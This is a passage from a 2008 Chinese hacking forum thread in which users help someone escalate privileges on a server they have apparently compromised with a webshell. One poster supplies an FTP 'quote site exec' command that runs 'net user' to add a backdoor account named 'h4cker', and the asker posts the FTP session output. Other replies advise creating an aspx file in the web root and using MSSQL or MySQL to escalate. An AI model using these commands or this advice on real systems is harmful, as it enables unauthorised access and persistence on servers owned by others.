12
返回列表 发帖
清新贵族

Rank: 1

帖子
18 
积分
27 
威望
36  
金钱
36  
在线时间
0 小时 
5 跳转到 »
发表于 2008-7-22 09:46 | 只看该作者
引用:
引用第1楼dingking于2007-12-28 04:36发表的 :
呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~


quote site exec "net user h4cker !!!@@@QQQaaa /add"

.......
谢谢提供方法哈。

230 User logged in, proceed.
ftp> quote site exec "net user h4cker !!!@@@QQQaaa /add"
200 EXEC command successful (TID=33).
ftp>

照你说的,,FTP提权又提示成功了
但到WEBSHELL里net user ,还是老样子,没有这个用户。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

sunue
晶莹剔透§烈日灼然

TOP

东莞大岭山

Rank: 1

帖子
28 
积分
42 
威望
56  
金钱
48  
在线时间
0 小时 
4
发表于 2008-7-22 09:46 | 只看该作者
复制内容到剪贴板
代码:
aspx上传上去直接是错误,无法运行。
上传不行,那你就新建一个aspx在根目录下吧。

然后看看这个aspx的权有多少大吧

帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

fucking
晶莹剔透§烈日灼然

TOP

★德仔★

Rank: 1

帖子
积分
12 
威望
16  
金钱
16  
在线时间
0 小时 
3
发表于 2008-7-22 09:46 | 只看该作者
如果涉及到MSSQL,MYSQL(不知道你是怎么拿到SHELL)。。。。俺看这是最好的提权选择,可以做太多事情了。。。


帖子28 精华0 积分103 阅读权限40 性别男 在线时间124 小时 注册时间2007-8-19 最后登录2008-6-6 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然

TOP

发车狂

Rank: 1

帖子
13 
积分
20 
威望
26  
金钱
24  
在线时间
0 小时 
2
发表于 2008-7-22 09:45 | 只看该作者
呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~


quote site exec "net user h4cker !!!@@@QQQaaa /add"

你试下.....也许就加上咯....
引用:
但一用net user /add 添加帐户就无回显,命令也没有执行。
WEBSHELL上加用户肯定是没回显的,因为都加不上嘛~.... 直接用 net user 查看用户是可以回显的....
昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

゛小︷帅!﹊
晶莹剔透§烈日灼然

TOP

12
返回列表